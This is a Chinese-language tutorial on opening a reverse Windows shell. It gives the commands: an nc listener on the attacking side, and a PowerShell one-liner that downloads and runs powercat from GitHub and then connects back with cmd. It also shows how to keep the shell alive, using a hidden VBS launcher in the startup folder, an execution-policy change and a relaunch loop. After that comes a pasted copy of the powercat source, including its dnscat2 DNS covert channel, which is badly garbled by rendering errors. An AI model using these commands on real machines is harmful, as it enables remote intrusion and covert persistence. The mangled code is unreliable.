反弹Windows shell

  • 方法:目标机powershell +攻击机nc

  1. 攻击机器运行:nc -l 2222

  1. 目标机:
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c -p 2222 -e cmd


  • curl : 未能解析此远程名称: ‘raw.githubusercontent.com’
    • 网络的原因无法加载远程的脚本内容
    • 解决办法:使用其他办法把它下在目标机并且命名为powercat.ps1 之后运行(powershell环境)
Import-Module ./powercat.ps1
powercat -c -p 2222 -e cmd


set ws=WScript.CreateObject("WScript.Shell") 
ws.Run "C:\Users\yaozhengbing\Desktop\shell.bat /start",0 

windows下win+R输入shell:common startup调出启动文件 将脚本添加进去

  • 在此系统上禁止运行脚本
    • 更改运行策略
    • set-ExecutionPolicy RemoteSigned
powershell Import-Module C:Windows\windows.ps1;set-ExecutionPolicy RemoteSigned;powercat -c -p 2222 -e cmd


Dim Count:Count = 5 
Do Until Count = 0 
  powershell Import-Module C:Windows\windows.ps1;set-ExecutionPolicy RemoteSigned;powercat -c -p 2222 -e cmd

function powercat
[alias(“Client”)][string] c = " " , [ a l i a s ( " L i s t e n " ) ] [ s w i t c h ] c="", [alias("Listen")][switch] c="",[alias("Listen")][switch]l= F a l s e , [ a l i a s ( " P o r t " ) ] [ P a r a m e t e r ( P o s i t i o n = − 1 ) ] [ s t r i n g ] False, [alias("Port")][Parameter(Position=-1)][string] False,[alias("Port")][Parameter(Position=1)][string]p="",
[alias(“Execute”)][string] e = " " , [ a l i a s ( " E x e c u t e P o w e r s h e l l " ) ] [ s w i t c h ] e="", [alias("ExecutePowershell")][switch] e="",[alias("ExecutePowershell")][switch]ep= F a l s e , [ a l i a s ( " R e l a y " ) ] [ s t r i n g ] False, [alias("Relay")][string] False,[alias("Relay")][string]r="",
[alias(“UDP”)][switch] u = u= u=False,
[alias(“dnscat2”)][string] d n s = " " , [ a l i a s ( " D N S F a i l u r e T h r e s h o l d " ) ] [ i n t 32 ] dns="", [alias("DNSFailureThreshold")][int32] dns="",[alias("DNSFailureThreshold")][int32]dnsft=10,
[alias(“Timeout”)][int32] t = 60 , [ P a r a m e t e r ( V a l u e F r o m P i p e l i n e = t=60, [Parameter(ValueFromPipeline= t=60,[Parameter(ValueFromPipeline=True)][alias(“Input”)] i = i= i=null,
[ValidateSet(‘Host’, ‘Bytes’, ‘String’)][alias(“OutputType”)][string] o = " H o s t " , [ a l i a s ( " O u t p u t F i l e " ) ] [ s t r i n g ] o="Host", [alias("OutputFile")][string] o="Host",[alias("OutputFile")][string]of="",
[alias(“Disconnect”)][switch] d = d= d=False,
[alias(“Repeater”)][switch] r e p = rep= rep=False,
[alias(“GeneratePayload”)][switch] g = g= g=False,
[alias(“GenerateEncoded”)][switch] g e = ge= ge=False,
[alias(“Help”)][switch] h = h= h=False

############### HELP ###############
$Help = "
powercat - Netcat, The Powershell Version
Github Repository: https://github.com/besimorhino/powercat

This script attempts to implement the features of netcat in a powershell
script. It also contains extra features such as built-in relays, execute
powershell, and a dnscat2 client.

Usage: powercat [-c or -l] [-p port] [options]

-c Client Mode. Provide the IP of the system you wish to connect to.
If you are using -dns, specify the DNS Server to send queries to.

-l Listen Mode. Start a listener on the port specified by -p.

-p Port. The port to connect to, or the port to listen on.

-e Execute. Specify the name of the process to start.

-ep Execute Powershell. Start a pseudo powershell session. You can
declare variables and execute commands, but if you try to enter
another shell (nslookup, netsh, cmd, etc.) the shell will hang.

-r Relay. Used for relaying network traffic between two nodes.
Client Relay Format: -r ::
Listener Relay Format: -r :
DNSCat2 Relay Format: -r dns:::

-u UDP Mode. Send traffic over UDP. Because it’s UDP, the client
must send data before the server can respond.

-dns DNS Mode. Send traffic over the dnscat2 dns covert channel.
Specify the dns server to -c, the dns port to -p, and specify the
domain to this option, -dns. This is only a client.
Get the server here: https://github.com/iagox86/dnscat2

-dnsft DNS Failure Threshold. This is how many bad packets the client can
recieve before exiting. Set to zero when receiving files, and set high
for more stability over the internet.

-t Timeout. The number of seconds to wait before giving up on listening or
connecting. Default: 60

-i Input. Provide data to be sent down the pipe as soon as a connection is
established. Used for moving files. You can provide the path to a file,
a byte array object, or a string. You can also pipe any of those into
powercat, like ‘aaaaaa’ | powercat -c -p 80

-o Output. Specify how powercat should return information to the console.
Valid options are ‘Bytes’, ‘String’, or ‘Host’. Default is ‘Host’.

-of Output File. Specify the path to a file to write output to.

-d Disconnect. powercat will disconnect after the connection is established
and the input from -i is sent. Used for scanning.

-rep Repeater. powercat will continually restart after it is disconnected.
Used for setting up a persistent server.

-g Generate Payload. Returns a script as a string which will execute the
powercat with the options you have specified. -i, -d, and -rep will not
be incorporated.

-ge Generate Encoded Payload. Does the same as -g, but returns a string which
can be executed in this way: powershell -E

-h Print this help message.


Listen on port 8000 and print the output to the console.
powercat -l -p 8000

Connect to port 443, send a shell, and enable verbosity.
powercat -c -p 443 -e cmd -v

Connect to the dnscat2 server on c2.example.com, and send dns queries
to the dns server on port 53.
powercat -c -p 53 -dns c2.example.com

Send a file to port 8000.
powercat -c -p 8000 -i C:\inputfile

Write the data sent to the local listener on port 4444 to C:\outfile
powercat -l -p 4444 -of C:\outfile

Listen on port 8000 and repeatedly server a powershell shell.
powercat -l -p 8000 -ep -rep

Relay traffic coming in on port 8000 over tcp to port 9000 on over tcp.
powercat -l -p 8000 -r tcp:

Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com,
sending queries to port 53.
powercat -l -p 8000 -r dns:
if($h){return $Help}
############### HELP ###############

############### VALIDATE ARGS ###############
$global:Verbose = V e r b o s e i f ( Verbose if( Verboseif(of -ne ‘’){KaTeX parse error: Expected 'EOF', got '}' at position 12: o = 'Bytes'}̲ if(dns -eq “”)
if((( c − e q " " ) − a n d ( ! c -eq "") -and (! ceq"")and(!l)) -or (($c -ne “”) -and l ) ) r e t u r n " Y o u m u s t s e l e c t e i t h e r c l i e n t m o d e ( − c ) o r l i s t e n m o d e ( − l ) . " i f ( l)){return "You must select either client mode (-c) or listen mode (-l)."} if( l))return"Youmustselecteitherclientmode(c)orlistenmode(l)."if(p -eq “”){return “Please provide a port number to -p.”}
if(((( r − n e " " ) − a n d ( r -ne "") -and ( rne"")and(e -ne “”)) -or (( e − n e " " ) − a n d ( e -ne "") -and ( ene"")and(ep))) -or (( r − n e " " ) − a n d ( r -ne "") -and ( rne"")and(ep))){return “You can only pick one of these: -e, -ep, -r”}
if(($i -ne n u l l ) − a n d ( ( null) -and (( null)and((r -ne “”) -or ( e − n e " " ) ) ) r e t u r n " − i i s n o t a p p l i c a b l e h e r e . " i f ( e -ne ""))){return "-i is not applicable here."} if( ene"")))return"iisnotapplicablehere."if(l)
$Failure = F a l s e n e t s t a t − n a ∣ S e l e c t − S t r i n g L I S T E N I N G ∣ False netstat -na | Select-String LISTENING | % {if(( FalsenetstatnaSelectStringLISTENING.ToString().split("😊[1].split(" “)[0]) -eq $p){Write-Output (“The selected port " + $p + " is already in use.”) ; F a i l u r e = Failure= Failure=True}}
if(KaTeX parse error: Expected 'EOF', got '}' at position 19: …lure){break} }̲ if(r -ne “”)
if($r.split(”😊.Count -eq 2)
$Failure = F a l s e n e t s t a t − n a ∣ S e l e c t − S t r i n g L I S T E N I N G ∣ False netstat -na | Select-String LISTENING | % {if(( FalsenetstatnaSelectStringLISTENING
.ToString().split("😊[1].split(" “)[0]) -eq $r.split(”😊[1]){Write-Output (“The selected port " + $r.split(”😊[1] + " is already in use.") ; F a i l u r e = Failure= Failure=True}}
############### VALIDATE ARGS ###############

############### UDP FUNCTIONS ###############
function Setup_UDP
param( F u n c S e t u p V a r s ) i f ( FuncSetupVars) if( FuncSetupVars)if(global:Verbose){$Verbose = $True}
c , c, c,l, p , p, p,t = $FuncSetupVars
$FuncVars = @{}
F u n c V a r s [ " E n c o d i n g " ] = N e w − O b j e c t S y s t e m . T e x t . A s c i i E n c o d i n g i f ( FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding if( FuncVars["Encoding"]=NewObjectSystem.Text.AsciiEncodingif(l)
$SocketDestinationBuffer = New-Object System.Byte[] 65536
$EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any), $p
$FuncVars[“Socket”] = New-Object System.Net.Sockets.UDPClient $p
$PacketInfo = New-Object System.Net.Sockets.IPPacketInformation
Write-Verbose (“Listening on [] port " + $p + " [udp]”)
$ConnectHandle = F u n c V a r s [ " S o c k e t " ] . C l i e n t . B e g i n R e c e i v e M e s s a g e F r o m ( FuncVars["Socket"].Client.BeginReceiveMessageFrom( FuncVars["Socket"].Client.BeginReceiveMessageFrom(SocketDestinationBuffer,0,65536,[System.Net.Sockets.SocketFlags]::None,[ref] E n d P o i n t , EndPoint, EndPoint,null,$null)
S t o p w a t c h = [ S y s t e m . D i a g n o s t i c s . S t o p w a t c h ] : : S t a r t N e w ( ) w h i l e ( Stopwatch = [System.Diagnostics.Stopwatch]::StartNew() while( Stopwatch=[System.Diagnostics.Stopwatch]::StartNew()while(True)
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …27) -contains (Host.UI.RawUI.ReadKey(“NoEcho,IncludeKeyDown,IncludeKeyUp”).VirtualKeyCode))
Write-Verbose “CTRL or ESC caught. Stopping UDP Setup…”
KaTeX parse error: Expected 'EOF', got '}' at position 46: …reak }̲ } …Stopwatch.Elapsed.TotalSeconds -gt $t)
KaTeX parse error: Expected 'EOF', got '}' at position 69: … break }̲ if(ConnectHandle.IsCompleted)
$SocketBytesRead = F u n c V a r s [ " S o c k e t " ] . C l i e n t . E n d R e c e i v e M e s s a g e F r o m ( FuncVars["Socket"].Client.EndReceiveMessageFrom( FuncVars["Socket"].Client.EndReceiveMessageFrom(ConnectHandle,ref,[ref] E n d P o i n t , [ r e f ] EndPoint,[ref] EndPoint,[ref]PacketInfo)
Write-Verbose (“Connection from [” + $EndPoint.Address.IPAddressToString + “] port " + $p + " [udp] accepted (source port " + E n d P o i n t . P o r t + " ) " ) i f ( EndPoint.Port + ")") if( EndPoint.Port+")")if(SocketBytesRead -gt 0){break}
$FuncVars[“InitialConnectionBytes”] = S o c k e t D e s t i n a t i o n B u f f e r [ 0.. ( [ i n t ] SocketDestinationBuffer[0..([int] SocketDestinationBuffer[0..([int]SocketBytesRead-1)]
I P L i s t = @ ( ) [ S y s t e m . N e t . D n s ] : : G e t H o s t A d d r e s s e s ( IPList = @() [System.Net.Dns]::GetHostAddresses( IPList=@()[System.Net.Dns]::GetHostAddresses(c) | Where-Object {KaTeX parse error: Expected 'EOF', got '}' at position 35: … "InterNetwork"}̲ | %{IPList += $_.IPAddressToString}
Write-Verbose ("Name " + $c + " resolved to address " + $IPList[0])
E n d P o i n t = N e w − O b j e c t S y s t e m . N e t . I P E n d P o i n t ( [ S y s t e m . N e t . I P A d d r e s s ] : : P a r s e ( EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse( EndPoint=NewObjectSystem.Net.IPEndPoint([System.Net.IPAddress]::Parse(IPList[0])), $p
E n d P o i n t = N e w − O b j e c t S y s t e m . N e t . I P E n d P o i n t ( [ S y s t e m . N e t . I P A d d r e s s ] : : P a r s e ( EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse( EndPoint=NewObjectSystem.Net.IPEndPoint([System.Net.IPAddress]::Parse(c)), $p
$FuncVars[“Socket”] = New-Object System.Net.Sockets.UDPClient
F u n c V a r s [ " S o c k e t " ] . C o n n e c t ( FuncVars["Socket"].Connect( FuncVars["Socket"].Connect(c,$p)
Write-Verbose ("Sending UDP traffic to " + $c + " port " + $p + “…”)
Write-Verbose (“UDP: Make sure to send some data so the server can notice you!”)
$FuncVars[“BufferSize”] = 65536
$FuncVars[“EndPoint”] = $EndPoint
$FuncVars[“StreamDestinationBuffer”] = New-Object System.Byte[] $FuncVars[“BufferSize”]
$FuncVars[“StreamReadOperation”] = F u n c V a r s [ " S o c k e t " ] . C l i e n t . B e g i n R e c e i v e F r o m ( FuncVars["Socket"].Client.BeginReceiveFrom( FuncVars["Socket"].Client.BeginReceiveFrom(FuncVars[“StreamDestinationBuffer”],0, F u n c V a r s [ " B u f f e r S i z e " ] , ( [ S y s t e m . N e t . S o c k e t s . S o c k e t F l a g s ] : : N o n e ) , [ r e f ] FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref] FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]FuncVars[“EndPoint”], n u l l , null, null,null)
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Rea…FuncVars)
$Data = n u l l i f ( null if( nullif(FuncVars[“StreamReadOperation”].IsCompleted)
$StreamBytesRead = F u n c V a r s [ " S o c k e t " ] . C l i e n t . E n d R e c e i v e F r o m ( FuncVars["Socket"].Client.EndReceiveFrom( FuncVars["Socket"].Client.EndReceiveFrom(FuncVars[“StreamReadOperation”],[ref] F u n c V a r s [ " E n d P o i n t " ] ) i f ( FuncVars["EndPoint"]) if( FuncVars["EndPoint"])if(StreamBytesRead -eq 0){break}
$Data = F u n c V a r s [ " S t r e a m D e s t i n a t i o n B u f f e r " ] [ 0.. ( [ i n t ] FuncVars["StreamDestinationBuffer"][0..([int] FuncVars["StreamDestinationBuffer"][0..([int]StreamBytesRead-1)]
$FuncVars[“StreamReadOperation”] = F u n c V a r s [ " S o c k e t " ] . C l i e n t . B e g i n R e c e i v e F r o m ( FuncVars["Socket"].Client.BeginReceiveFrom( FuncVars["Socket"].Client.BeginReceiveFrom(FuncVars[“StreamDestinationBuffer”],0, F u n c V a r s [ " B u f f e r S i z e " ] , ( [ S y s t e m . N e t . S o c k e t s . S o c k e t F l a g s ] : : N o n e ) , [ r e f ] FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref] FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]FuncVars[“EndPoint”], n u l l , null, null,null)
return D a t a , Data, Data,FuncVars
function WriteData_UDP
param( D a t a , Data, Data,FuncVars)
F u n c V a r s [ " S o c k e t " ] . C l i e n t . S e n d T o ( FuncVars["Socket"].Client.SendTo( FuncVars["Socket"].Client.SendTo(Data,$FuncVars[“EndPoint”]) | Out-Null
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Clo…FuncVars)
############### UDP FUNCTIONS ###############

############### DNS FUNCTIONS ###############
function Setup_DNS
param( F u n c S e t u p V a r s ) i f ( FuncSetupVars) if( FuncSetupVars)if(global:Verbose){$Verbose = KaTeX parse error: Expected 'EOF', got '}' at position 5: True}̲ function C…String)
$Hex = @()
S t r i n g . T o C h a r A r r a y ( ) ∣ String.ToCharArray() | % {"{0:x}" -f [byte] String.ToCharArray()} | % {if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …{"0" + [string]} else{[string]KaTeX parse error: Expected group after '_' at position 1: _̲}} | % {Hex += $_}
return $Hex

function SendPacket
  $Command = ("set type=TXT`nserver $DNSServer`nset port=$DNSPort`nset domain=.com`nset retry=1`n" + $Packet + "`nexit")
  $result = ($Command | nslookup 2>&1 | Out-String)
  if($result.Contains('"')){return ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value)}
  else{return 1}

function Create_SYN
  return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "00" + $SessionId + $SeqNum + "0000" + $Domain)

function Create_FIN
  return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "02" + $SessionId + "00" + $Domain)

function Create_MSG
  return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "01" + $SessionId + $SeqNum + $AcknowledgementNumber + $Data + $Domain)

function DecodePacket

  if((($Packet.Length)%2 -eq 1) -or ($Packet.Length -eq 0)){return 1}
  $AcknowledgementNumber = ($Packet[10..13] -join "")
  $SeqNum = ($Packet[14..17] -join "")
  [byte[]]$ReturningData = @()

  if($Packet.Length -gt 18)
    $PacketElim = $Packet.Substring(18)
    while($PacketElim.Length -gt 0)
      $ReturningData += [byte[]][Convert]::ToInt16(($PacketElim[0..1] -join ""),16)
      $PacketElim = $PacketElim.Substring(2)

  return $Packet,$ReturningData,$AcknowledgementNumber,$SeqNum

function AcknowledgeData
  $Hex = [string]("{0:x}" -f (([uint16]("0x" + $AcknowledgementNumber) + $ReturningData.Length) % 65535))
  if($Hex.Length -ne 4){$Hex = (("0"*(4-$Hex.Length)) + $Hex)}
  return $Hex
$FuncVars = @{}
$FuncVars["DNSServer"],$FuncVars["DNSPort"],$FuncVars["Domain"],$FuncVars["FailureThreshold"] = $FuncSetupVars
if($FuncVars["DNSPort"] -eq ''){$FuncVars["DNSPort"] = "53"}
$FuncVars["Tag"] = ""
$FuncVars["Domain"] = ("." + $FuncVars["Domain"])

$FuncVars["Create_SYN"] = ${function:Create_SYN}
$FuncVars["Create_MSG"] = ${function:Create_MSG}
$FuncVars["Create_FIN"] = ${function:Create_FIN}
$FuncVars["DecodePacket"] = ${function:DecodePacket}
$FuncVars["ConvertTo-HexArray"] = ${function:ConvertTo-HexArray}
$FuncVars["AckData"] = ${function:AcknowledgeData}
$FuncVars["SendPacket"] = ${function:SendPacket}
$FuncVars["SessionId"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
$FuncVars["SeqNum"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
$FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
$FuncVars["Failures"] = 0

$SYNPacket = (Invoke-Command $FuncVars["Create_SYN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["Tag"],$FuncVars["Domain"]))
$ResponsePacket = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($SYNPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))
$DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($ResponsePacket))
if($DecodedPacket -eq 1){return "Bad SYN response. Ensure your server is set up correctly."}
$ReturningData = $DecodedPacket[1]
if($ReturningData -ne ""){$FuncVars["InputData"] = ""}
$FuncVars["AckNum"] = $DecodedPacket[2]
$FuncVars["MaxMSGDataSize"] = (244 - (Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],"",$FuncVars["Tag"],$FuncVars["Domain"])).Length)
if($FuncVars["MaxMSGDataSize"] -le 0){return "Domain name is too long."}
return $FuncVars

function ReadData_DNS
param( F u n c V a r s ) i f ( FuncVars) if( FuncVars)if(global:Verbose){$Verbose = $True}

$PacketsData = @()
$PacketData = ""

if($FuncVars["InputData"] -ne $null)
  $Hex = (Invoke-Command $FuncVars["ConvertTo-HexArray"] -ArgumentList @($FuncVars["InputData"]))
  $SectionCount = 0
  $PacketCount = 0
  foreach($Char in $Hex)
    if($SectionCount -ge 30)
      $SectionCount = 0
      $PacketData += "."
    if($PacketCount -ge ($FuncVars["MaxMSGDataSize"]))
      $PacketsData += $PacketData.TrimEnd(".")
      $PacketCount = 0
      $SectionCount = 0
      $PacketData = ""
    $PacketData += $Char
    $SectionCount += 2
    $PacketCount += 2
  $PacketData = $PacketData.TrimEnd(".")
  $PacketsData += $PacketData
  $FuncVars["InputData"] = ""
  $PacketsData = @("")

[byte[]]$ReturningData = @()
foreach($PacketData in $PacketsData)
  try{$MSGPacket = Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],$PacketData,$FuncVars["Tag"],$FuncVars["Domain"])}
  catch{ Write-Verbose "DNSCAT2: Failed to create packet." ; $FuncVars["Failures"] += 1 ; continue }
  try{$Packet = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($MSGPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))}
  catch{ Write-Verbose "DNSCAT2: Failed to send packet." ; $FuncVars["Failures"] += 1 ; continue }
    $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($Packet))
    if($DecodedPacket.Length -ne 4){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..."; $FuncVars["Failures"] += 1 ; continue }
    $FuncVars["AckNum"] = $DecodedPacket[2]
    $FuncVars["SeqNum"] = $DecodedPacket[3]
    $ReturningData += $DecodedPacket[1]
  catch{ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
  if($DecodedPacket -eq 1){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }

if($FuncVars["Failures"] -ge $FuncVars["FailureThreshold"]){break}

if($ReturningData -ne @())
  $FuncVars["AckNum"] = (Invoke-Command $FuncVars["AckData"] -ArgumentList @($ReturningData,$FuncVars["AckNum"]))
return $ReturningData,$FuncVars

function WriteData_DNS
param( D a t a , Data, Data,FuncVars)
$FuncVars[“InputData”] = F u n c V a r s [ " E n c o d i n g " ] . G e t S t r i n g ( FuncVars["Encoding"].GetString( FuncVars["Encoding"].GetString(Data)
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Clo…FuncVars)
$FINPacket = Invoke-Command F u n c V a r s [ " C r e a t e F I N " ] − A r g u m e n t L i s t @ ( FuncVars["Create_FIN"] -ArgumentList @( FuncVars["CreateFIN"]ArgumentList@(FuncVars[“SessionId”], F u n c V a r s [ " T a g " ] , FuncVars["Tag"], FuncVars["Tag"],FuncVars[“Domain”])
Invoke-Command F u n c V a r s [ " S e n d P a c k e t " ] − A r g u m e n t L i s t @ ( FuncVars["SendPacket"] -ArgumentList @( FuncVars["SendPacket"]ArgumentList@(FINPacket, F u n c V a r s [ " D N S S e r v e r " ] , FuncVars["DNSServer"], FuncVars["DNSServer"],FuncVars[“DNSPort”]) | Out-Null
############### DNS FUNCTIONS ###############

########## TCP FUNCTIONS ##########
function Setup_TCP
c , c, c,l, p , p, p,t = F u n c S e t u p V a r s i f ( FuncSetupVars if( FuncSetupVarsif(global:Verbose){$Verbose = $True}
F u n c V a r s = @ i f ( ! FuncVars = @{} if(! FuncVars=@if(!l)
$FuncVars[“l”] = $False
$Socket = New-Object System.Net.Sockets.TcpClient
Write-Verbose “Connecting…”
$Handle = S o c k e t . B e g i n C o n n e c t ( Socket.BeginConnect( Socket.BeginConnect(c, p , p, p,null,$null)
$FuncVars[“l”] = $True
Write-Verbose ("Listening on [] (port " + $p + “)”)
$Socket = New-Object System.Net.Sockets.TcpListener $p
$Handle = S o c k e t . B e g i n A c c e p t T c p C l i e n t ( Socket.BeginAcceptTcpClient( Socket.BeginAcceptTcpClient(null, $null)

$Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
    if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown,IncludeKeyUp").VirtualKeyCode))
      Write-Verbose "CTRL or ESC caught. Stopping TCP Setup..."
  if($Stopwatch.Elapsed.TotalSeconds -gt $t)
    Write-Verbose "Timeout!" ; break
        $Stream = $Socket.GetStream()
        $BufferSize = $Socket.ReceiveBufferSize
        Write-Verbose ("Connection to " + $c + ":" + $p + " [tcp] succeeded!")
      catch{$Socket.Close(); $Stopwatch.Stop(); break}
      $Client = $Socket.EndAcceptTcpClient($Handle)
      $Stream = $Client.GetStream()
      $BufferSize = $Client.ReceiveBufferSize
      Write-Verbose ("Connection from [" + $Client.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $port + " [tcp] accepted (source port " + $Client.Client.RemoteEndPoint.Port + ")")
if($Socket -eq $null){break}
$FuncVars["Stream"] = $Stream
$FuncVars["Socket"] = $Socket
$FuncVars["BufferSize"] = $BufferSize
$FuncVars["StreamDestinationBuffer"] = (New-Object System.Byte[] $FuncVars["BufferSize"])
$FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
$FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
$FuncVars["StreamBytesRead"] = 1
return $FuncVars

function ReadData_TCP
$Data = n u l l i f ( null if( nullif(FuncVars[“StreamBytesRead”] -eq 0){break}
$StreamBytesRead = F u n c V a r s [ " S t r e a m " ] . E n d R e a d ( FuncVars["Stream"].EndRead( FuncVars["Stream"].EndRead(FuncVars[“StreamReadOperation”])
if($StreamBytesRead -eq 0){break}
$Data = F u n c V a r s [ " S t r e a m D e s t i n a t i o n B u f f e r " ] [ 0.. ( [ i n t ] FuncVars["StreamDestinationBuffer"][0..([int] FuncVars["StreamDestinationBuffer"][0..([int]StreamBytesRead-1)]
$FuncVars[“StreamReadOperation”] = F u n c V a r s [ " S t r e a m " ] . B e g i n R e a d ( FuncVars["Stream"].BeginRead( FuncVars["Stream"].BeginRead(FuncVars[“StreamDestinationBuffer”], 0, $FuncVars[“BufferSize”], $null, $null)
return D a t a , Data, Data,FuncVars
function WriteData_TCP
param( D a t a , Data, Data,FuncVars)
F u n c V a r s [ " S t r e a m " ] . W r i t e ( FuncVars["Stream"].Write( FuncVars["Stream"].Write(Data, 0, $Data.Length)
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Clo…FuncVars)
try{KaTeX parse error: Expected 'EOF', got '}' at position 27: …tream"].Close()}̲ catch{} …FuncVars[“l”]){KaTeX parse error: Expected 'EOF', got '}' at position 26: …Socket"].Stop()}̲ else{FuncVars[“Socket”].Close()}
########## TCP FUNCTIONS ##########

########## CMD FUNCTIONS ##########
function Setup_CMD
param( F u n c S e t u p V a r s ) i f ( FuncSetupVars) if( FuncSetupVars)if(global:Verbose){$Verbose = $True}
$FuncVars = @{}
$ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo
$ProcessStartInfo.FileName = $FuncSetupVars[0]
$ProcessStartInfo.UseShellExecute = $False
$ProcessStartInfo.RedirectStandardInput = $True
$ProcessStartInfo.RedirectStandardOutput = $True
$ProcessStartInfo.RedirectStandardError = $True
F u n c V a r s [ " P r o c e s s " ] = [ S y s t e m . D i a g n o s t i c s . P r o c e s s ] : : S t a r t ( FuncVars["Process"] = [System.Diagnostics.Process]::Start( FuncVars["Process"]=[System.Diagnostics.Process]::Start(ProcessStartInfo)
Write-Verbose ("Starting Process " + $FuncSetupVars[0] + “…”)
$FuncVars[“Process”].Start() | Out-Null
$FuncVars[“StdOutDestinationBuffer”] = New-Object System.Byte[] 65536
$FuncVars[“StdOutReadOperation”] = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d O u t p u t . B a s e S t r e a m . B e g i n R e a d ( FuncVars["Process"].StandardOutput.BaseStream.BeginRead( FuncVars["Process"].StandardOutput.BaseStream.BeginRead(FuncVars[“StdOutDestinationBuffer”], 0, 65536, $null, $null)
$FuncVars[“StdErrDestinationBuffer”] = New-Object System.Byte[] 65536
$FuncVars[“StdErrReadOperation”] = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d E r r o r . B a s e S t r e a m . B e g i n R e a d ( FuncVars["Process"].StandardError.BaseStream.BeginRead( FuncVars["Process"].StandardError.BaseStream.BeginRead(FuncVars[“StdErrDestinationBuffer”], 0, 65536, $null, $null)
$FuncVars[“Encoding”] = New-Object System.Text.AsciiEncoding
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Rea…FuncVars)
[byte[]] D a t a = @ ( ) i f ( Data = @() if( Data=@()if(FuncVars[“StdOutReadOperation”].IsCompleted)
$StdOutBytesRead = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d O u t p u t . B a s e S t r e a m . E n d R e a d ( FuncVars["Process"].StandardOutput.BaseStream.EndRead( FuncVars["Process"].StandardOutput.BaseStream.EndRead(FuncVars[“StdOutReadOperation”])
if($StdOutBytesRead -eq 0){break}
$Data += F u n c V a r s [ " S t d O u t D e s t i n a t i o n B u f f e r " ] [ 0.. ( [ i n t ] FuncVars["StdOutDestinationBuffer"][0..([int] FuncVars["StdOutDestinationBuffer"][0..([int]StdOutBytesRead-1)]
$FuncVars[“StdOutReadOperation”] = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d O u t p u t . B a s e S t r e a m . B e g i n R e a d ( FuncVars["Process"].StandardOutput.BaseStream.BeginRead( FuncVars["Process"].StandardOutput.BaseStream.BeginRead(FuncVars[“StdOutDestinationBuffer”], 0, 65536, $null, KaTeX parse error: Expected 'EOF', got '}' at position 11: null) }̲ if(FuncVars[“StdErrReadOperation”].IsCompleted)
$StdErrBytesRead = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d E r r o r . B a s e S t r e a m . E n d R e a d ( FuncVars["Process"].StandardError.BaseStream.EndRead( FuncVars["Process"].StandardError.BaseStream.EndRead(FuncVars[“StdErrReadOperation”])
if($StdErrBytesRead -eq 0){break}
$Data += F u n c V a r s [ " S t d E r r D e s t i n a t i o n B u f f e r " ] [ 0.. ( [ i n t ] FuncVars["StdErrDestinationBuffer"][0..([int] FuncVars["StdErrDestinationBuffer"][0..([int]StdErrBytesRead-1)]
$FuncVars[“StdErrReadOperation”] = F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d E r r o r . B a s e S t r e a m . B e g i n R e a d ( FuncVars["Process"].StandardError.BaseStream.BeginRead( FuncVars["Process"].StandardError.BaseStream.BeginRead(FuncVars[“StdErrDestinationBuffer”], 0, 65536, $null, $null)
return D a t a , Data, Data,FuncVars
function WriteData_CMD
param( D a t a , Data, Data,FuncVars)
F u n c V a r s [ " P r o c e s s " ] . S t a n d a r d I n p u t . W r i t e L i n e ( FuncVars["Process"].StandardInput.WriteLine( FuncVars["Process"].StandardInput.WriteLine(FuncVars[“Encoding”].GetString($Data).TrimEnd(“r").TrimEnd("n”))
